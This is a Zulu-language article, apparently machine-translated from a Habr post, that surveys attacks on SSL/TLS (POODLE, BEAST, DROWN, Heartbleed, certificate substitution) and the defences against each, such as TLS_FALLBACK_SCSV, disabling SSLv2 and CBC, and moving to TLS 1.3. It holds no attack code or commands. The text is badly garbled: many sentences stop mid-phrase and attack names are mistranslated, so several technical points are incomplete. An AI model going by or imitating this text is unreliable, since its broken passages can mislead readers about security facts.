Ingxenye yamasayithi
/flickr/
I-POODLE
Okokuqala mayelana nokuhlasela
Ingqikithi yayo imi kanje: isigebengu siphoqa iklayenti ukuthi lixhume nge-SSL 3.0, elingisa ukunqanyulwa. Bese isesha kokubethelwe
I-SSL 3.0 iphrothokholi ephelelwe yisikhathi. Kodwa umbuzo wokuphepha kwakhe usabalulekile. Amaklayenti ayisebenzisela ukugwema izinkinga zokusebenzisana namaseva. Ngokusho kwedatha ethile, cishe i-7% yezindawo eziyizinkulungwane eziyi-100 ezithandwa kakhulu
Indlela yokuzivikela. Esimeni se-POODLE yasekuqaleni, udinga ukukhubaza ukusekelwa kwe-SSL 3.0. Nokho, kulesi simo kukhona ingozi izinkinga ukuhambisana. Esinye isisombululo kungaba indlela ye-TLS_FALLBACK_SCSV - iqinisekisa ukuthi ukushintshaniswa kwedatha nge-SSL 3.0 kuzokwenziwa kuphela ngamasistimu amadala. Abahlaseli ngeke besakwazi ukuqalisa ukwehliswa kwephrothokholi. Indlela yokuvikela ngokumelene ne-Zombie POODLE kanye ne-GOLDENDOODLE ukukhubaza ukusekelwa kwe-CBC kuzinhlelo zokusebenza ezisekelwe ku-TLS 1.2. Isixazululo esiyinhloko kuzoba ukushintshela ku-TLS 1.3 - inguqulo entsha yephrothokholi ayisebenzisi ukubethela kwe-CBC. Esikhundleni salokho, kusetshenziswa i-AES ne-ChaCha20 ehlala isikhathi eside.
BEAST
Okunye kokuhlasela kokuqala kwe-SSL ne-TLS 1.0, okutholwe ngo-2011. Njengo-POODLE, ISILO
Kuze kube manje, ubungozi be-BEAST busekhona
Indlela yokuzivikela. Umhlaseli udinga ukuthumela izicelo ezijwayelekile ukuze asuse ukubethela kwedatha. Ku-VMware
MINZA
Lokhu ukuhlasela kwe-cross-protocol okusebenzisa iziphazamisi ekusetshenzisweni kwe-SSLv2 ngokhiye abangu-40-bit RSA. Umhlaseli ulalela amakhulukhulu ezixhumanisi ze-TLS zethagethi futhi athumele amaphakethe akhethekile kuseva ye-SSLv2 esebenzisa ukhiye ofanayo oyimfihlo. Ukusebenzisa
I-DOWN iqale ukwaziwa ngo-2016 - kwase kwenzeka
Indlela yokuzivikela. Kuyadingeka ukufaka amapheshi ahlongozwe abathuthukisi bemitapo yolwazi yokufihla ulwazi ekhubaza usekelo lwe-SSLv2. Isibonelo, iziqephu ezimbili ezinjalo zethulwa i-OpenSSL (ngo-2016
"Insiza ingase ibe sengcupheni yokuhlaselwa yi-DROWN uma okhiye bayo besetshenziswa iseva yenkampani yangaphandle ene-SSLv2, njengeseva yemeyili," kuphawula inhloko yomnyango wezokuthuthukiswa.
Umhlinzeki we-IaaS 1cloud.ru Sergei Belkin. - Lesi simo senzeka uma amaseva amaningana esebenzisa isitifiketi se-SSL esivamile. Kulokhu, udinga ukukhubaza ukwesekwa kwe-SSLv2 kuyo yonke imishini."
Ungahlola ukuthi ingabe isistimu yakho idinga ukubuyekezwa kusetshenziswa okukhethekile
Kubuhlungu
Obunye bobungozi obukhulu ku-software
Ukuhlasela kwenziwa ngemojula yesandiso se-Heartbeat TLS encane. Iphrothokholi ye-TLS idinga ukuthi idatha idluliselwe ngokuqhubekayo. Esimeni sokuphumula isikhathi eside, ikhefu liyenzeka futhi ukuxhumana kufanele kumiswe kabusha. Ukuze ubhekane nenkinga, amaseva namakhasimende βbanomsindoβ wesiteshi (
Ukuba sengozini bekukhona kuzo zonke izinguqulo zelabhulali phakathi kuka-1.0.1 kanye ne-1.0.1f ehlanganisiwe, kanye nenani lezinhlelo zokusebenza - Ubuntu kufika ku-12.04.4, i-CentOS endala kuno-6.5, i-OpenBSD 5.3 nezinye. Kukhona uhlu oluphelele
Indlela yokuzivikela. Kuyadingeka
Ukushintshwa kwesitifiketi
I-node ephethwe enesitifiketi esisemthethweni se-SSL ifakiwe phakathi komsebenzisi neseva, ivimbela ithrafikhi. Le nodi izenza iseva esemthethweni ngokwethula isitifiketi esivumelekile, futhi kuba nokwenzeka ukwenza ukuhlasela kwe-MITM.
Ngokusho
Indlela yokuzivikela. Sebenzisa izinsiza ezithembekile
Enye indlela yokuvikela kuzoba entsha
/flickr/
Amathemba e-HTTPS
Naphezu kobungozi obuningi, iziqhwaga ze-IT nochwepheshe bezokuphepha bolwazi bayazethemba ngekusasa lephrothokholi. Ngokusetshenziswa okusebenzayo kwe-HTTPS
Kuphinde kuhlelwe ukuthuthukisa ubuchwepheshe be-SSL/TLS kusetshenziswa ukufunda ngomshini - ama-algorithms ahlakaniphile azoba nesibopho sokuhlunga ithrafikhi enonya. Ngoxhumo lwe-HTTPS, abalawuli abanayo indlela yokuthola okuqukethwe kwemilayezo ebethelwe, okuhlanganisa nokuthola izicelo ezivela kuhlelo olungayilungele ikhompuyutha. Kakade namuhla, amanethiwekhi e-neural ayakwazi ukuhlunga amaphakethe angaba yingozi ngokunemba okungu-90%. (
okutholakele
Ukuhlaselwa okuningi ku-HTTPS akuhlobene nezinkinga zephrothokholi ngokwayo, kodwa kusekela izindlela zokubethela eziphelelwe yisikhathi. Imboni ye-IT isiqala ukushiya kancane kancane izivumelwano zesizukulwane sangaphambilini futhi inikeze amathuluzi amasha okusesha ubungozi. Ngokuzayo, lawa mathuluzi azohlakanipha kakhulu.
Izixhumanisi ezengeziwe esihlokweni:
Ukuthuthukiswa emafini, ukuphepha kolwazi nedatha yomuntu siqu: digest from 1cloud I-SSL digest: Izinto ezisetshenziswayo ezihamba phambili ku-HabrΓ© nokuningi Inhlabamkhosi ye-VPN: Izindatshana eziyisingeniso ku-HabrΓ© nokuningi
Source: www.habr.com